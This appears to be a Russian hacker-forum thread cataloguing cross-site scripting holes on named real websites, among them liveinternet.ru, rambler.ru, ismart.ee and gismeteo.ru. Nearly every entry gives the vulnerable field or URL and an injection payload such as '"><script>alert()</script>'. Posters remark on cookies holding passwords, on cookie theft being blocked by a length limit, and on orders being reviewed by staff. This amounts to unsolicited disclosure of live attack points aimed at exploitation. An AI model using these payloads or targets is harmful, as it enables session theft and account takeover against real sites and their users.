warlog.info Заходим в настройки сайта. Уязвимо поле "Название" Code: <script>alert();</script> Теперь при просмотре статистики сайта на главной странице вылезает алерт.
Downloads.ru Выбираем любой файл....пишем к нему комментарий... Все поля уязвимые т.е. мыло, ник и сообщение ... Code: "><script>alert("xss")</script> Пример
liveinternet.ru В дневниках. 1) Пишем личное сообщение. Уязвимо поле "Заголовок:" Code: "><script>alert();</script> Если пользователь ответит на это сообщение, то велезет алерт. 2) Добавляем новость в дневник. Уязвимо поле "Добавление новости:" Code: "><script>alert();</script>
zip-2002, Code: http://www.zip-2002.ru/forum/new.php?t=1&cat=3 В форме сообщения вводим: <script>alert();</script>
Сайт: http://aktiv.kak-ya.ru/ Путь: http://aktiv.kak-ya.ru/by/ole4ka/2006/04/26/3434/comments Уязвимое поле: Заголовок Code: "><script>alert("hek \nActive_jaja")</script> Сайт: http://forum.allsoch.ru/ Путь: http://forum.allsoch.ru/showthread.php3?s=11&threadid=17076 Уязвимое поле: Ваш ответ. Code: "><script>alert()</script>
http://www.booka.ru/ Вставить в поле Поиск Code: "><script>alert()</script> http://www.oplachu.ru/tov226182.html Вставить в поле Ваш комментарий Code: "><script>alert()</script> http://catalog.kgbi.ru/ http://catalog.designatelie.ru Вставить в поле Поиска Code: "><script>alert()</script>
Gals, это же пассивная xss. Сайт: http://www.photo-cult.com/ Путь: http://www.photo-cult.com/showpic.php?rate&id=187916 Уязвимое поле: Коментар Code: "><script>alert()</script>
http://www.bilandima.ru бррр..противно... Дневники>Новая Запись> Адрес фотографии > Code: http://"><script>alert(/xss/)</script> да ещё там в куках..пасс в открытом виде)
rambler.ru В «Планете» -> «Профиль» -> «Контакты» Уязвимо поле “ICQ 2” и название аватарки. Куки не стыришь, тк ограничение стоит 22 символа((( Code: <img src=javascript:alert()>
http://kemclub.ru/ При регистрации (http://kemclub.ru/reg.php), уязвимо поле Ф.И.О - Code: <script>alert()</script> , потом заходим Code: http://kemclub.ru/club.php?p=8&srat=1 Находим себя, получаем алерт.
http://ismart.ee/ Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : ) При регистарации ( Code: http://ismart.ee/Books.dll/login?next=index ) уязвимы поля: 1. E-mail; - вписываем Code: [email protected]"><script>alert(/xss/)</script> 2. Ваше имя. - вписаваем Code: <script>alert(/xss/)</script> Далее можно изменить приветствие на Code: <script>alert(/xss/)</script> , тоже работает. Все заказы просматриваются вручную кстати И напоследок пассивная XSS, хотя это и не так интересно : Code: http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
forum.xakep.ru Запостил сюда тк не понял какой у них тип форума. На форуме прицепляем файл тхт с содержанием: "><script>alert()</script> и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации. на ие не тестил, он у меня глючит).
на ачате слева ссылка $$$ для web-мастеров http://tak.ru/editing.php в любом поле нет фильтрации : "><script>alert()</script>
http://dyn.gismeteo.ru/cgi-bin/showmap.exe?base=commonmaps&file=BALTIC.GIF&lang=rus&title=%3Cscript%3Ealert('Here%20was%202pick');%3C/script%3E